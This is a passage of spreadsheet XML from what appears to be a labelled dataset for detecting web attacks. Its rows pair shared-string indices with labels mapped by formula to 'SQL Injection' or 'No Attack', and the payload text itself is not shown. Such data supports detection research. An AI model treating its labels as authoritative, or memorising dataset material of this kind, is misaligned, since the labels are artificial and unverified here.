      <c r="C6183" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6184" s="1" t="s">
        <v>794</v>
      </c>
      <c r="B6184">
        <v>1</v>
      </c>
      <c r="C6184" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6185" s="1" t="s">
        <v>826</v>
      </c>
      <c r="B6185">
        <v>1</v>
      </c>
      <c r="C6185" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6186" s="1" t="s">
        <v>764</v>
      </c>
      <c r="B6186">
        <v>1</v>
      </c>
      <c r="C6186" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6187" s="1" t="s">
        <v>795</v>
      </c>
      <c r="B6187">
        <v>1</v>
      </c>
      <c r="C6187" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6188" s="1" t="s">
        <v>827</v>
      </c>
      <c r="B6188">
        <v>1</v>
      </c>
      <c r="C6188" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6189" s="1" t="s">
        <v>765</v>
      </c>
      <c r="B6189">
        <v>1</v>
      </c>
      <c r="C6189" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6190" s="1" t="s">
        <v>796</v>
      </c>
      <c r="B6190">
        <v>1</v>
      </c>
      <c r="C6190" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6191" s="1" t="s">
        <v>828</v>
      </c>
      <c r="B6191">
        <v>1</v>
      </c>
      <c r="C6191" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6192" s="1" t="s">
        <v>766</v>
      </c>
      <c r="B6192">
        <v>1</v>
      </c>
      <c r="C6192" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6193" s="1" t="s">
        <v>797</v>
      </c>
      <c r="B6193">
        <v>1</v>
      </c>
      <c r="C6193" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6194" s="1" t="s">
        <v>829</v>
      </c>
      <c r="B6194">
        <v>1</v>
      </c>
      <c r="C6194" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6195" s="1" t="s">
        <v>767</v>
      </c>
      <c r="B6195">
        <v>1</v>
      </c>
      <c r="C6195" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6196" s="1" t="s">
        <v>798</v>
      </c>
      <c r="B6196">
        <v>1</v>
      </c>
      <c r="C6196" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6197" s="1" t="s">
        <v>830</v>
      </c>
      <c r="B6197">
        <v>1</v>
      </c>
      <c r="C6197" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6198" s="1" t="s">
        <v>768</v>
      </c>
      <c r="B6198">
        <v>1</v>
      </c>
      <c r="C6198" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6199" s="1" t="s">
        <v>799</v>
      </c>
      <c r="B6199">
        <v>1</v>
      </c>
      <c r="C6199" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6200" s="1" t="s">
        <v>831</v>
      </c>
      <c r="B6200">
        <v>1</v>
      </c>
      <c r="C6200" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6201" s="1" t="s">
        <v>769</v>
      </c>
      <c r="B6201">
        <v>1</v>
      </c>
      <c r="C6201" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6202" s="1" t="s">
        <v>800</v>
      </c>
      <c r="B6202">
        <v>1</v>
      </c>
      <c r="C6202" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6203" s="1" t="s">
        <v>832</v>
      </c>
      <c r="B6203">
        <v>1</v>
      </c>
      <c r="C6203" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6204" s="1" t="s">
        <v>770</v>
      </c>
      <c r="B6204">
        <v>1</v>
      </c>
      <c r="C6204" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6205" s="1" t="s">
        <v>801</v>
      </c>
      <c r="B6205">
        <v>1</v>
      </c>
      <c r="C6205" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6206" s="1" t="s">
        <v>833</v>
      </c>
      <c r="B6206">
        <v>1</v>
      </c>
      <c r="C6206" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6207" s="1" t="s">
        <v>771</v>
      </c>
      <c r="B6207">
        <v>1</v>
      </c>
      <c r="C6207" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6208" s="1" t="s">
        <v>802</v>
      </c>
      <c r="B6208">
        <v>1</v>
      </c>
      <c r="C6208" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6209" s="1" t="s">
        <v>834</v>
      </c>
      <c r="B6209">
        <v>1</v>
      </c>
      <c r="C6209" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6210" s="1" t="s">
        <v>772</v>
      </c>
      <c r="B6210">
        <v>1</v>
      </c>
      <c r="C6210" s="7" t="str">
        <f t="shared" si="96"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6211" s="1" t="s">
        <v>803</v>
      </c>
      <c r="B6211">
        <v>1</v>
      </c>
      <c r="C6211" s="7" t="str">
        <f t="shared" ref="C6211:C6274" si="97">IF(B6211=0,"No Attack", IF(B6211=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6212" s="1" t="s">
        <v>817</v>
      </c>
      <c r="B6212">
        <v>1</v>
      </c>
      <c r="C6212" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6213" s="1" t="s">
        <v>755</v>
      </c>
      <c r="B6213">
        <v>1</v>
      </c>
      <c r="C6213" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6214" s="1" t="s">
        <v>786</v>
      </c>
      <c r="B6214">
        <v>1</v>
      </c>
      <c r="C6214" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6215" s="1" t="s">
        <v>835</v>
      </c>
      <c r="B6215">
        <v>1</v>
      </c>
      <c r="C6215" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6216" s="1" t="s">
        <v>773</v>
      </c>
      <c r="B6216">
        <v>1</v>
      </c>
      <c r="C6216" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6217" s="1" t="s">
        <v>804</v>
      </c>
      <c r="B6217">
        <v>1</v>
      </c>
      <c r="C6217" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6218" s="1" t="s">
        <v>836</v>
      </c>
      <c r="B6218">
        <v>1</v>
      </c>
      <c r="C6218" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6219" s="1" t="s">
        <v>774</v>
      </c>
      <c r="B6219">
        <v>1</v>
      </c>
      <c r="C6219" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6220" s="1" t="s">
        <v>805</v>
      </c>
      <c r="B6220">
        <v>1</v>
      </c>
      <c r="C6220" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6221" s="1" t="s">
        <v>837</v>
      </c>
      <c r="B6221">
        <v>1</v>
      </c>
      <c r="C6221" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6222" s="1" t="s">
        <v>775</v>
      </c>
      <c r="B6222">
        <v>1</v>
      </c>
      <c r="C6222" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6223" s="1" t="s">
        <v>806</v>
      </c>
      <c r="B6223">
        <v>1</v>
      </c>
      <c r="C6223" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6224" s="1" t="s">
        <v>838</v>
      </c>
      <c r="B6224">
        <v>1</v>
      </c>
      <c r="C6224" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6225" s="1" t="s">
        <v>776</v>
      </c>
      <c r="B6225">
        <v>1</v>
      </c>
      <c r="C6225" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6226" s="1" t="s">
        <v>807</v>
      </c>
      <c r="B6226">
        <v>1</v>
      </c>
      <c r="C6226" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6227" s="1" t="s">
        <v>839</v>
      </c>
      <c r="B6227">
        <v>1</v>
      </c>
      <c r="C6227" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6228" s="1" t="s">
        <v>777</v>
      </c>
      <c r="B6228">
        <v>1</v>
      </c>
      <c r="C6228" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6229" s="1" t="s">
        <v>808</v>
      </c>
      <c r="B6229">
        <v>1</v>
      </c>
      <c r="C6229" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6230" s="1" t="s">
        <v>840</v>
      </c>
      <c r="B6230">
        <v>1</v>
      </c>
      <c r="C6230" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6231" s="1" t="s">
        <v>778</v>
      </c>
      <c r="B6231">
        <v>1</v>
      </c>
      <c r="C6231" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6232" s="1" t="s">
        <v>809</v>
      </c>
      <c r="B6232">
        <v>1</v>
      </c>
      <c r="C6232" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6233" s="1" t="s">
        <v>841</v>
      </c>
      <c r="B6233">
        <v>1</v>
      </c>
      <c r="C6233" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6234" s="1" t="s">
        <v>779</v>
      </c>
      <c r="B6234">
        <v>1</v>
      </c>
      <c r="C6234" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6235" s="1" t="s">
        <v>810</v>
      </c>
      <c r="B6235">
        <v>1</v>
      </c>
      <c r="C6235" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6236" s="1" t="s">
        <v>842</v>
      </c>
      <c r="B6236">
        <v>1</v>
      </c>
      <c r="C6236" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6237" s="1" t="s">
        <v>780</v>
      </c>
      <c r="B6237">
        <v>1</v>
      </c>
      <c r="C6237" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6238" s="1" t="s">
        <v>811</v>
      </c>
      <c r="B6238">
        <v>1</v>
      </c>
      <c r="C6238" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6239" s="1" t="s">
        <v>843</v>
      </c>
      <c r="B6239">
        <v>1</v>
      </c>
      <c r="C6239" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6240" s="1" t="s">
        <v>781</v>
      </c>
      <c r="B6240">
        <v>1</v>
      </c>
      <c r="C6240" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6241" s="1" t="s">
        <v>812</v>
      </c>
      <c r="B6241">
        <v>1</v>
      </c>
      <c r="C6241" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6242" s="1" t="s">
        <v>844</v>
      </c>
      <c r="B6242">
        <v>1</v>
      </c>
      <c r="C6242" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6243" s="1" t="s">
        <v>782</v>
      </c>
      <c r="B6243">
        <v>1</v>
      </c>
      <c r="C6243" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6244" s="1" t="s">
        <v>813</v>
      </c>
      <c r="B6244">
        <v>1</v>
      </c>
      <c r="C6244" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6245" s="1" t="s">
        <v>818</v>
      </c>
      <c r="B6245">
        <v>1</v>
      </c>
      <c r="C6245" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6246" s="1" t="s">
        <v>756</v>
      </c>
      <c r="B6246">
        <v>1</v>
      </c>
      <c r="C6246" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6247" s="1" t="s">
        <v>787</v>
      </c>
      <c r="B6247">
        <v>1</v>
      </c>
      <c r="C6247" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6248" s="1" t="s">
        <v>845</v>
      </c>
      <c r="B6248">
        <v>1</v>
      </c>
      <c r="C6248" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6249" s="1" t="s">
        <v>783</v>
      </c>
      <c r="B6249">
        <v>1</v>
      </c>
      <c r="C6249" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6250" s="1" t="s">
        <v>814</v>
      </c>
      <c r="B6250">
        <v>1</v>
      </c>
      <c r="C6250" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6251" s="1" t="s">
        <v>846</v>
      </c>
      <c r="B6251">
        <v>1</v>
      </c>
      <c r="C6251" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6252" s="1" t="s">
        <v>784</v>
      </c>
      <c r="B6252">
        <v>1</v>
      </c>
      <c r="C6252" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6253" s="1" t="s">
        <v>815</v>
      </c>
      <c r="B6253">
        <v>1</v>
      </c>
      <c r="C6253" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6254" s="1" t="s">
        <v>819</v>
      </c>
      <c r="B6254">
        <v>1</v>
      </c>
      <c r="C6254" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6255" s="1" t="s">
        <v>757</v>
      </c>
      <c r="B6255">
        <v>1</v>
      </c>
      <c r="C6255" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6256" s="1" t="s">
        <v>788</v>
      </c>
      <c r="B6256">
        <v>1</v>
      </c>
      <c r="C6256" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6257" s="1" t="s">
        <v>820</v>
      </c>
      <c r="B6257">
        <v>1</v>
      </c>
      <c r="C6257" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6258" s="1" t="s">
        <v>758</v>
      </c>
      <c r="B6258">
        <v>1</v>
      </c>
      <c r="C6258" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6259" s="1" t="s">
        <v>789</v>
      </c>
      <c r="B6259">
        <v>1</v>
      </c>
      <c r="C6259" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6260" s="1" t="s">
        <v>821</v>
      </c>
      <c r="B6260">
        <v>1</v>
      </c>
      <c r="C6260" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6261" s="1" t="s">
        <v>759</v>
      </c>
      <c r="B6261">
        <v>1</v>
      </c>
      <c r="C6261" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6262" s="1" t="s">
        <v>790</v>
      </c>
      <c r="B6262">
        <v>1</v>
      </c>
      <c r="C6262" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6263" s="1" t="s">
        <v>822</v>
      </c>
      <c r="B6263">
        <v>1</v>
      </c>
      <c r="C6263" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6264" s="1" t="s">
        <v>760</v>
      </c>
      <c r="B6264">
        <v>1</v>
      </c>
      <c r="C6264" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6265" s="1" t="s">
        <v>791</v>
      </c>
      <c r="B6265">
        <v>1</v>
      </c>
      <c r="C6265" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6266" s="1" t="s">
        <v>823</v>
      </c>
      <c r="B6266">
        <v>1</v>
      </c>
      <c r="C6266" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6267" s="1" t="s">
        <v>761</v>
      </c>
      <c r="B6267">
        <v>1</v>
      </c>
      <c r="C6267" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6268" s="1" t="s">
        <v>792</v>
      </c>
      <c r="B6268">
        <v>1</v>
      </c>
      <c r="C6268" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6269" s="1" t="s">
        <v>824</v>
      </c>
      <c r="B6269">
        <v>1</v>
      </c>
      <c r="C6269" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6270" s="1" t="s">
        <v>762</v>
      </c>
      <c r="B6270">
        <v>1</v>
      </c>
      <c r="C6270" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6271" s="1" t="s">
        <v>793</v>
      </c>
      <c r="B6271">
        <v>1</v>
      </c>
      <c r="C6271" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6272" s="1" t="s">
        <v>897</v>
      </c>
      <c r="B6272">
        <v>1</v>
      </c>
      <c r="C6272" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6273" s="1" t="s">
        <v>957</v>
      </c>
      <c r="B6273">
        <v>1</v>
      </c>
      <c r="C6273" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6274" s="1" t="s">
        <v>927</v>
      </c>
      <c r="B6274">
        <v>1</v>
      </c>
      <c r="C6274" s="7" t="str">
        <f t="shared" si="97"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="6275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6275" s="1" t="s">
        <v>7124</v>
      </c>
      <c r="B6275">
        <v>0</v>
      </c>
      <c r="C6275" s="7" t="str">
        <f t="shared" ref="C6275:C6338" si="98">IF(B6275=0,"No Attack", IF(B6275=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6276" s="1" t="s">
        <v>7206</v>
      </c>
      <c r="B6276">
        <v>0</v>
      </c>
      <c r="C6276" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6277" s="1" t="s">
        <v>9854</v>
      </c>
      <c r="B6277">
        <v>0</v>
      </c>
      <c r="C6277" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6278" s="1" t="s">
        <v>7761</v>
      </c>
      <c r="B6278">
        <v>0</v>
      </c>
      <c r="C6278" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6279" s="1" t="s">
        <v>7756</v>
      </c>
      <c r="B6279">
        <v>0</v>
      </c>
      <c r="C6279" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6280" s="1" t="s">
        <v>9701</v>
      </c>
      <c r="B6280">
        <v>0</v>
      </c>
      <c r="C6280" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6281" s="1" t="s">
        <v>8970</v>
      </c>
      <c r="B6281">
        <v>0</v>
      </c>
      <c r="C6281" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6282" s="1" t="s">
        <v>9442</v>
      </c>
      <c r="B6282">
        <v>0</v>
      </c>
      <c r="C6282" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6283" s="1" t="s">
        <v>7665</v>
      </c>
      <c r="B6283">
        <v>0</v>
      </c>
      <c r="C6283" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6284" s="1" t="s">
        <v>9041</v>
      </c>
      <c r="B6284">
        <v>0</v>
      </c>
      <c r="C6284" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6285" s="1" t="s">
        <v>9745</v>
      </c>
      <c r="B6285">
        <v>0</v>
      </c>
      <c r="C6285" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="6286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6286" s="1" t="s">
        <v>6951</v>
      </c>
      <c r="B6286">
        <v>0</v>
      </c>
      <c r="C6286" s="7" t="str">
        <f t="shared" si="98"/>
        <v>No Attack</v>
      </c>
    </row>
